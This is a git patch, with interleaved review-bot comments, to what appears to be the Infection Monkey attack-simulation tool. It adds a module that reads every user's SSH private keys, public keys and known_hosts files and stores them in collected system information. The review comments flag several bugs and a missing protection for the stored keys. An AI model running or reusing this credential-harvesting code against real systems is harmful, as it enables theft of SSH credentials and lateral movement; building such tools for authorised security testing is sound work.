From cdb4d459bbf4674801b865f4b4c06f89c6a10525 Mon Sep 17 00:00:00 2001
From: Vakaris
Date: Wed, 16 May 2018 15:19:59 +0300
Subject: [PATCH] SSH key-stealing implemented
---
 .../system_info/SSH_info_collector.py | 68 +++++++++++++++++++
 .../system_info/linux_info_collector.py | 3 +
 2 files changed, 71 insertions(+)
 create mode 100644 infection_monkey/system_info/SSH_info_collector.py
diff --git a/infection_monkey/system_info/SSH_info_collector.py b/infection_monkey/system_info/SSH_info_collector.py
new file mode 100644
index 000000000..d4bbddb15
--- /dev/null
+++ b/infection_monkey/system_info/SSH_info_collector.py
@@ -0,0 +1,68 @@
+import logging
+import pwd
+import sys
+import os
+import glob
+
+__author__ = 'VakarisZ'
+
+LOG = logging.getLogger(__name__)
+
+
+class SSHCollector(object):
+ """
+ SSH keys and known hosts collection module
+ """
+
+ default_dirs = ['/.ssh', '/']
+
+ @staticmethod
+ def get_info():
+ home_dirs = SSHCollector.get_home_dirs()
+ ssh_info = SSHCollector.get_ssh_files(home_dirs)
+ LOG.info("Scanned for ssh keys")
+ return ssh_info
+
+ @staticmethod
+ def get_home_dirs():
+ home_dirs = [{'name': 'root', 'home_dir': '/root', 'public_key': None,
+ 'private_key': None, 'known_hosts': None}]
+ for usr in pwd.getpwall():
+ if usr[5].startswith('/home'):
+ ssh_data = {'name': usr[0], 'home_dir': usr[5], 'public_key': None,
+ 'private_key': None, 'known_hosts': None}
+ home_dirs.append(ssh_data)
+ return home_dirs
+
+ @staticmethod
+ def get_ssh_files(usr_info):
+ for info in usr_info:
+ path = info['home_dir']
+ for directory in SSHCollector.default_dirs:
+ if os.path.isdir(path + directory):
+ try:
+ os.chdir(path + directory)
+ # searching for public key
+ if glob.glob('*.pub'):
+ public = '/' + (glob.glob('*.pub')[0])
+ try:
+ with open(path + directory + public) as f:
+ info['public_key'] = f.read()
+ private = public.split('.')[0]
+ except:
+ pass
+ if os.path.exists(path + directory + private):
+ try:
+ with open(path + directory + private) as f:
+ info['private_key'] = f.read()
+ except:
+ pass
+ if os.path.exists(path + directory + '/known_hosts'):
+ try:
+ with open(path + directory + '/known_hosts') as f:
+ info['known_hosts'] = f.read()
+ except:
+ pass
+ except:
+ pass
+ return usr_info
diff --git a/infection_monkey/system_info/linux_info_collector.py b/infection_monkey/system_info/linux_info_collector.py
index ccdd7cb30..556be812a 100644
--- a/infection_monkey/system_info/linux_info_collector.py
+++ b/infection_monkey/system_info/linux_info_collector.py
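Review bot: In `get_ssh_files`, `private` is assigned only inside the `try` that reads the public key, so when that read fails the following `os.path.exists(path + directory + private)` either raises NameError, which the outer bare `except` swallows along with the `known_hosts` read, or reuses a value left over from an earlier iteration. Derive the name before the `try`, for example `private = os.path.splitext(public)[0]`, which also stops `split('.')` from truncating a file name that contains another dot. `os.chdir(path + directory)` changes the working directory of the whole process and never restores it; globbing on `os.path.join(path + directory, '*.pub')` and opening the returned path directly would avoid that side effect. The four bare `except: pass` blocks hide every failure, so narrowing them to `except (IOError, OSError)` with a `LOG.debug` call would leave a trace of which files could not be read. `import sys` is unused.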
@@ -1,6 +1,7 @@
 import logging
 from . import InfoCollector
+from SSH_info_collector import SSHCollector
 __author__ = 'uri'
@@ -26,4 +27,6 @@ class LinuxInfoCollector(InfoCollector):
 self.get_process_list()
 self.get_network_info()
 self.get_azure_info()
+ self.info['ssh_info'].update(SSHCollector.get_info())
 return self.info
+
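Review bot: `self.info['ssh_info'].update(SSHCollector.get_info())` looks wrong on two counts: nothing in this patch creates `self.info['ssh_info']`, so unless `InfoCollector` initialises it elsewhere the lookup raises KeyError, and `get_info()` returns a list of per-user dicts, which `dict.update` would reject with ValueError. A plain assignment, `self.info['ssh_info'] = SSHCollector.get_info()`, matches the list the collector builds. In the first hunk of this file, `from SSH_info_collector import SSHCollector` is an implicit relative import next to the explicit `from . import InfoCollector`; `from .SSH_info_collector import SSHCollector` would be consistent. Because `self.info` now carries private key text in cleartext, the code that transports and stores that dict (not visible here) should be confirmed to encrypt it and restrict who can read it. The enclosing method starts outside the hunk.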